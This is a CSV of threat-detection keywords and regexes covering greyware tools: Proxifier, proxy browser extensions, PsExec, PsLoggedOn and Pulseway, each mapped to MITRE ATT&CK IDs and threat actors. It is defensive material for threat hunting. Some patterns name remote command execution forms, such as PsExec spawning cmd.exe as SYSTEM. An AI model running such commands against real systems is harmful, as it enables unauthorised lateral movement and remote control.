"*http://www.proxifier.com/distr/last_versions/ProxifierMac*",".{0,1000}http\:\/\/www\.proxifier\.com\/distr\/last_versions\/ProxifierMac.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*http://www.proxifier.com/distr/last_versions/ProxifierPortable*",".{0,1000}http\:\/\/www\.proxifier\.com\/distr\/last_versions\/ProxifierPortable.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*Program Files (x86)\Proxifier*",".{0,1000}Program\sFiles\s\(x86\)\\Proxifier.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*padekgcemlokbadohgkifijomclgjgif*",".{0,1000}padekgcemlokbadohgkifijomclgjgif.{0,1000}","greyware_tool_keyword","Proxy SwitchyOmega","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*dpplabbmogkhghncfbfdeeokoefdjegm*",".{0,1000}dpplabbmogkhghncfbfdeeokoefdjegm.{0,1000}","greyware_tool_keyword","Proxy SwitchySharp","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*llbhddikeonkpbhpncnhialfbpnilcnc*",".{0,1000}llbhddikeonkpbhpncnhialfbpnilcnc.{0,1000}","greyware_tool_keyword","ProxyFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* -accepteula -nobanner -d cmd.exe /c *",".{0,1000}\s\-accepteula\s\-nobanner\s\-d\scmd\.exe\s\/c\s.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*.exe -i -s cmd.exe*",".{0,1000}\.exe\s\-i\s\-s\scmd\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\PsExec.exe*",".{0,1000}\\PsExec\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Sysinternals\PsExec\EulaAccepted*",".{0,1000}\\SOFTWARE\\Sysinternals\\PsExec\\EulaAccepted.{0,1000}","greyware_tool_keyword","psexec","PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. install persistent threats. and evade some security systems. ","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","#registry","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\Windows\Prefetch\PSEXEC*",".{0,1000}\\Windows\\Prefetch\\PSEXEC.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*\Windows\PSEXEC-*.key*",".{0,1000}\\Windows\\PSEXEC\-.{0,1000}\.key.{0,1000}","greyware_tool_keyword","psexec",".key file created and deleted on the target system","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","contain the hostname of the attacker in the file name","10","10","N/A","N/A","N/A","N/A"
"*PSEXEC-*.key*",".{0,1000}PSEXEC\-.{0,1000}\.key.{0,1000}","greyware_tool_keyword","psexec",".key file created and deleted on the target system","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*PsExec[1].exe*",".{0,1000}PsExec\[1\]\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*PsExec64.exe*",".{0,1000}PsExec64\.exe.{0,1000}","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling Lateral Movement. privilege escalation. or the execution of malicious payloads.","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*PSEXECSVC*",".{0,1000}PSEXECSVC.{0,1000}","greyware_tool_keyword","psexec","PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. install persistent threats. and evade some security systems. ","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","#servicename","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*PSEXECSVC.EXE-*.pf*",".{0,1000}PSEXECSVC\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","psexec","prefetch - .key file created and deleted on the target system","T1136.002 - T1543.003 - T1570 - T1021.002 - T1569.002","TA0002 - TA0008 - TA0009 - TA0011","N/A","Turla - Chimera - APT1 - Thrip - Moses Staff - BlackTech - Cleaver - DarkVishnya - Sandworm Team - HAFNIUM - Akira - APT39 - FIN5 - FIN6 - Indrik Spider - TEMP.Veles - Kimsuky - GALLIUM - APT29 - Carbanak - Leafminer - FIN8 - Fox Kitten - Dragonfly - Magic Hound - OilRig - Cobalt Group - Naikon - Threat Group-1314 - menuPass - Wizard Spider","Lateral Movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*PsLoggedon.exe*",".{0,1000}PsLoggedon\.exe.{0,1000}","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"*PsLoggedon64.exe*",".{0,1000}PsLoggedon64\.exe.{0,1000}","greyware_tool_keyword","psloggedon","PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one","T1003 - T1049 - T1057 - T1082 - T1087 - T1518","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon","1","1","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A"
"* <Data>Received Request Run command *</Data>*",".{0,1000}\s\<Data\>Received\sRequest\sRun\scommand\s.{0,1000}\<\/Data\>.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* PCMonitorManager.exe*",".{0,1000}\sPCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* PCMonitorSrv.exe*",".{0,1000}\sPCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* pulseway_x64.deb*",".{0,1000}\spulseway_x64\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* Pulseway_x64.msi*",".{0,1000}\sPulseway_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* pulseway_x86.deb*",".{0,1000}\spulseway_x86\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/pulseway/config.xml*",".{0,1000}\/etc\/pulseway\/config\.xml.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/PCMonitorManager.exe*",".{0,1000}\/PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/PCMonitorSrv.exe*",".{0,1000}\/PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pcmrdp-client.dll*",".{0,1000}\/pcmrdp\-client\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pulseway_x64.deb*",".{0,1000}\/pulseway_x64\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Pulseway_x64.msi*",".{0,1000}\/Pulseway_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/pulseway_x86.deb*",".{0,1000}\/pulseway_x86\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/systemd/system/pulseway.service*",".{0,1000}\/systemd\/system\/pulseway\.service.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/sbin/pulseway*",".{0,1000}\/usr\/sbin\/pulseway.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/sbin/pulsewayd*",".{0,1000}\/usr\/sbin\/pulsewayd.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\*\RemoteDesktop.exe*",".{0,1000}\\AppData\\Roaming\\.{0,1000}\\RemoteDesktop\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\*\uac.tmp",".{0,1000}\\AppData\\Roaming\\.{0,1000}\\uac\.tmp","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\MMSOFT Design\PC Monitor*",".{0,1000}\\MMSOFT\sDesign\\PC\sMonitor.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\MMSOFT Design\Pulseway\*",".{0,1000}\\MMSOFT\sDesign\\Pulseway\\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\PCMonitorManager.exe*",".{0,1000}\\PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PCMonitorSrv.exe*",".{0,1000}\\PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PCMonitorTypes.dll*",".{0,1000}\\PCMonitorTypes\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pcmrdp-client.dll*",".{0,1000}\\pcmrdp\-client\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pcmupdate.exe*",".{0,1000}\\pcmupdate\.exe.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pcmupdate.exe.config*",".{0,1000}\\pcmupdate\.exe\.config.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Pulseway Remote Control\*",".{0,1000}\\Pulseway\sRemote\sControl\\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Pulseway\*",".{0,1000}\\Pulseway\\.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pulseway_x64.deb*",".{0,1000}\\pulseway_x64\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Pulseway_x64.msi*",".{0,1000}\\Pulseway_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pulseway_x86.deb*",".{0,1000}\\pulseway_x86\.deb.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\PulsewayServiceCheck*",".{0,1000}\\PulsewayServiceCheck.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\pwyrc-agent.dll*",".{0,1000}\\pwyrc\-agent\.dll.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\pwy-rd\shell\open\command*",".{0,1000}\\pwy\-rd\\shell\\open\\command.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\RemoteDesktop_x64.msi*",".{0,1000}\\RemoteDesktop_x64\.msi.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Microsoft\Tracing\PCMonitorSrv_RAS*",".{0,1000}\\SOFTWARE\\Microsoft\\Tracing\\PCMonitorSrv_RAS.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
